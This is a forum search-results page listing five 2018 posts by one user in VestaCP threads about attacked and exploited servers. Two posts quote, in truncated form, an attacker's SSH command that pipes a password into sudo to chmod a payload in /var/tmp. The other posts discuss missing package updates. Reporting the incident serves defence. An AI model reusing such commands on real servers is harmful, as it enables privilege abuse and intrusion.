We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
Search found 5 matches
- Tue Sep 25, 2018 6:34 pm
- Forum: General Discussion
- Topic: All VestaCP installations being attacked
- Replies: 230
- Views: 716385
Re: All VestaCP installations being attacked
My development server Debian 9 was install on 23rd.
All my other servers are fine they are over year since installed, the webui is locked down to just my ip.
All my other servers are fine they are over year since installed, the webui is locked down to just my ip.
- Tue Sep 25, 2018 6:25 pm
- Forum: General Discussion
- Topic: All VestaCP installations being attacked
- Replies: 230
- Views: 716385
Re: All VestaCP installations being attacked
My dev server got compromise as the password for admin user got changed, lucky I had the shell for admin user set to rssh so that attempt to run the payload in /var/tmp got blocked. Heres the attempted command run via ssh from ip:45.76.146.8 command: echo "9WlgVjGkot" | sudo -S -p "" chmod 0777 /va...
- Tue Sep 25, 2018 4:55 pm
- Forum: General Discussion
- Topic: All VestaCP installations being attacked
- Replies: 230
- Views: 716385
Re: All VestaCP installations being attacked
My dev server got compromise as the password for admin user got changed, lucky I had the shell for admin user set to rssh so that attempt to run the payload in /var/tmp got blocked. Heres the attempted command run via ssh from ip:45.76.146.8 command: echo "9WlgVjGkot" | sudo -S -p "" chmod 0777 /var...
- Mon Apr 09, 2018 6:46 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 699977
Re: Got 10 VestaCP servers exploited
When is version 0.9.8-20 going to be uploaded to the Debian 9 repo, ever other version Debain and Ubuntu got the 0.9.8-20 version of Vesta. Got the version each from the repo using for i in wheezy jessie stretch quantal raring saucy utopic vivid wily trusty; do echo "$i:" $(curl -s http://apt.vestac...
- Sun Apr 08, 2018 11:31 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 699977
Re: Got 10 VestaCP servers exploited
Version 0.9.8-20 Dose not seem to be released for Debain 9.
Code: Select all
apt-get -qq update &&apt-cache show vesta|grep "Version"
Version: 0.9.8-19